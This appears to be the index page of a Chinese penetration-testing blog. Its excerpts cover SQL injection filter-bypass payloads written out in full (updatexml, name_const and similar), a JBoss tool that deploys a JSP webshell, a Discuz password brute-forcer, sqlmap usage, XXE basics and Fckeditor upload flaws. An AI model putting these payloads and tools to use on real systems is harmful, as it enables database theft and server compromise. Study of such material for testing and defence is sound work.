Stay Hungry,Stay Foolish(求知若饥,虚心若愚。)——Steve Jobs

feed订阅 腾讯微博 新浪微博 twitter 你好,欢迎光临!

基于关键字的黑名单 过滤关键字    and or php代码    preg_match('/(and|or)/i',$id) 会过滤的攻击代码    1 or 1=1 1 and 1=1 绕过方式&...
'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)# '=0 group by elt(rand(),version())having sum(0)# '-updatexml(0,repeat(version(),2),2)# ...
一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。   DTD(文档类型定义)的作用是定义 XML...
好长时间没有更新博客了 刚写的第一个版本  有bug的话 欢迎联系我QQ 87146980   正文: JBoss漏洞利用小工具 c#编写 原理是自动部署一个August.war的小马 shell.jsp <% if(request.getParameter("f")!=nul...
 好长时间没有更新博客了 来一发Discuz!创始人爆破工具  刚写的第一个版本  有bug的话 欢迎联系我QQ 87146980   主要用于破解创始人的密码     程序截图 &...
-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p "page,id") -D "" #指定数据库名 -T "" #指定表名 -C "" #指定字段 -s "" #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s ...

Web 2.0网站的九个特点

2014.10.29, 经验分享 ,抢沙发,1825人打酱油
《Amazon.com Mashups》,里面总结了web 2.0网站的九个特征。 一般来说,web 2.0网站有如下的特征:   1. 以用户为中心(User Centered) 传统网站是以网站设计者为中心,用户只能看到设计者让他们看到的内容。Web 2.0网站则是以用户为中心,所有的或...
一款集成sqlmap到burpsuite中的插件(整合两大神器) 在网上寻找类似的插件,发现了一款:https://code.google.com/p/gason/ 不过对windows支持并不好,于是自己动手开发一款 配置: 首先安装sqlmap,传送门:http://sqlma...

SQL注入之SQLmap入门

2014.10.09, 经验分享 ,抢沙发,3848人打酱油
什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap...

Fckeditor上传漏洞汇总

2014.09.29, 技术作品 ,2条评论,4233人打酱油
伴随着这次Fckeditor新爆出来的一个漏洞,我来写个小总结,如有不全欢迎大家进行补充。仅关注上传漏洞,列目录、XSS什么的不在讨论之列。 1.ASP版 asp一般是搭在windows主机上,webserver一般为IIS6/IIS7/IIS7.5。具我现在所知,asp版的fckeditor已经可以全秒了 &...